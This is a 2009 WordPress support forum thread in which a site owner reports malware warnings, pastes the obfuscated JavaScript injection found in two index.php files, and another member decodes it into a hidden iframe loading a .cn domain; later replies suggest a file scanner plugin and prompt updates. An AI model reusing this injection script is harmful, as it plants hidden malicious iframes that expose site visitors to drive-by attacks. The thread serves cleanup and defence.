Wordpress Themes - WP Forum at BFA
There will be no more development for Atahualpa (or any other theme), and no support. Also no new registrations. I turned off the donation system. I may turn the forum to read only if it gets abused for spam. Unfortunately I have no time for the forum or the themes. Thanks a lot to the people who helped in all these years, especially Larry and of course: Paul. Take care and stay healthy -- Flynn, Atahualpa developer, Sep 2021

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme »

Malware on my site


  #1  
Old May 21, 2009, 09:53 PM
scrubbs
 
22 posts · Apr 2009
site is http://www.inspirationalparenting.com

Yesterday, I started getting warnings of a virus/malware on my site. It is called Bloodhound.Exploit.213 and Bloodhound.Exploit.196.

Has anyone experienced this? My host (godaddy) is giving me the runaround. Any ideas on what I can do?

I recently updated the plugin Add to any: but not sure how that could impact.

It seems to happen most when I access the site admin dashboard but ouside users have notified me as well.

Help!!!
  #2  
Old May 22, 2009, 07:50 AM
Flynn's Avatar
Flynn
 
3,768 posts · Oct 2008
Munich, Germany
Perhaps this helps http://wordpress.org/support/topic/242327
  #3  
Old May 22, 2009, 10:29 AM
scrubbs
 
22 posts · Apr 2009
Apparently my site got hacked (according to godaddy). I am trying to avoid paying them a large fee to restore it all from their backup.

I do have a backup but it is only of the content in the database and not the entire site. I may have to start over and rebuild the entire thing which represents weeks of work...

I may have found the file they modified. Can you help me with something?

What should the file index.php in the wp-content folder look like?

Mine has the following in it...

<?php
// Silence is golden.
?><?php echo '<script type="text/javascript">var cOTtEtyFSFfjldSGegJo = "lAOY60lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lA OY32lAOY119lAOY105lAOY100lAOY116lAOY104lAOY61lAOY3 4lAOY52lAOY56lAOY48lAOY34lAOY32lAOY104lAOY101lAOY1 05lAOY103lAOY104lAOY116lAOY61lAOY34lAOY54lAOY48lAO Y34lAOY32lAOY115lAOY114lAOY99lAOY61lAOY34lAOY104lA OY116lAOY116lAOY112lAOY58lAOY47lAOY47lAOY116lAOY11 4lAOY97lAOY102lAOY102lAOY105lAOY99lAOY115lAOY45lAO Y105lAOY110lAOY115lAOY112lAOY101lAOY99lAOY116lAOY1 11lAOY114lAOY46lAOY99lAOY110lAOY47lAOY100lAOY97lAO Y105lAOY108lAOY121lAOY95lAOY115lAOY116lAOY97lAOY11 6lAOY115lAOY47lAOY105lAOY110lAOY46lAOY99lAOY103lAO Y105lAOY63lAOY52lAOY34lAOY32lAOY115lAOY116lAOY121l AOY108lAOY101lAOY61lAOY34lAOY98lAOY111lAOY114lAOY1 00lAOY101lAOY114lAOY58lAOY48lAOY112lAOY120lAOY59lA OY32lAOY112lAOY111lAOY115lAOY105lAOY116lAOY105lAOY 111lAOY110lAOY58lAOY114lAOY101lAOY108lAOY97lAOY116 lAOY105lAOY118lAOY101lAOY59lAOY32lAOY116lAOY111lAO Y112lAOY58lAOY48lAOY112lAOY120lAOY59lAOY32lAOY108l AOY101lAOY102lAOY116lAOY58lAOY45lAOY53lAOY48lAOY48 lAOY112lAOY120lAOY59lAOY32lAOY111lAOY112lAOY97lAOY 99lAOY105lAOY116lAOY121lAOY58lAOY48lAOY59lAOY32lAO Y102lAOY105lAOY108lAOY116lAOY101lAOY114lAOY58lAOY1 12lAOY114lAOY111lAOY103lAOY105lAOY100lAOY58lAOY68l AOY88lAOY73lAOY109lAOY97lAOY103lAOY101lAOY84lAOY11 4lAOY97lAOY110lAOY115lAOY102lAOY111lAOY114lAOY109l AOY46lAOY77lAOY105lAOY99lAOY114lAOY111lAOY115lAOY1 11lAOY102lAOY116lAOY46lAOY65lAOY108lAOY112lAOY104l AOY97lAOY40lAOY111lAOY112lAOY97lAOY99lAOY105lAOY11 6lAOY121lAOY61lAOY48lAOY41lAOY59lAOY32lAOY45lAOY10 9lAOY111lAOY122lAOY45lAOY111lAOY112lAOY97lAOY99lAO Y105lAOY116lAOY121lAOY58lAOY48lAOY34lAOY62lAOY60lA OY47lAOY105lAOY102lAOY114lAOY97lAOY109lAOY101lAOY6 2";var aRaKwtvZBKReZlYeeWkx = cOTtEtyFSFfjldSGegJo.split("lAOY");var cPgNszUXgdMGvmQsgMRi = "";for (var XjMxUkbzHLxjaexTdRrJ=1; XjMxUkbzHLxjaexTdRrJ<aRaKwtvZBKReZlYeeWkx.length; XjMxUkbzHLxjaexTdRrJ++){cPgNszUXgdMGvmQsgMRi+=Stri ng.fromCharCode(aRaKwtvZBKReZlYeeWkx[XjMxUkbzHLxjaexTdRrJ]);}var BvcYOhYUIDCJXNobcdEr = ""+cPgNszUXgdMGvmQsgMRi+"";document.write(""+BvcYO hYUIDCJXNobcdEr+"")</script>'; ?>


Perhaps this is what the hacker modified?
  #4  
Old May 22, 2009, 11:06 AM
scrubbs
 
22 posts · Apr 2009
I think I may have been able to clean it out. I found the above-mentioned script in two index.php files (wpcontent and wpadmin). I forgot I had downloaded my site to my computer so I compared those files to what I had downloaded and then confirmed that script is bad.

I went through the entire site with FTP and only found those two files had been updated on the day this happened so hopefully I cleaned it out and can avoid paying for an entire restore!
  #5  
Old May 22, 2009, 11:58 AM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
So this puzzled me aand I decided to 'decode' the script. When it does the Document.write what it's writing is the following
-------
<iframe width= 480 height= 60 src= http://traffics-inspector.cn/daily_stats/in.cgi?4 style= border:0px;position:relative;top:0px;left:-500px;opacity:0;filterrogid:DXImageTransform.Mic rosoft.Alpha(opacity=0);-moz-opacity:0 ></iframe
--------
for what it's worth

Last edited by juggledad; May 22, 2009 at 05:42 PM.
  #6  
Old May 26, 2009, 11:30 AM
owenl
 
44 posts · Jan 2009
Suggest that everyone get the Exploit Scanner Wp plugin and run it every couple of weeks - it watches all your WP and theme files for this kind of attack (usually SQL injection - they try to get it to work by placing PHP code embedded in comments that gets run automatically).

ANyway - the two best defences are to update wordpress ALWAYS asap - and to use this plugin. It scans all your files and lists everything that might be an attack so you can compare the files.

One disadvantage - it flgs itself a lot (since it uses small sections of examples as to what is bad) and it flags a lot of javascript user interface files that are needed by real plugins.

I run it after installing on a setup that I know is clean and note all the OK things it flags and then watch for things that are different.
  #7  
Old May 26, 2009, 02:01 PM
juggledad's Avatar
juggledad
 
23,765 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
Just tried to install exploit scanner - looks like it doesn't work with WP 2.7.1 there is a post on the wordpress forums that is hasn't worked since WP 2.6.3

All times are GMT -6. The time now is 12:03 PM.


Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.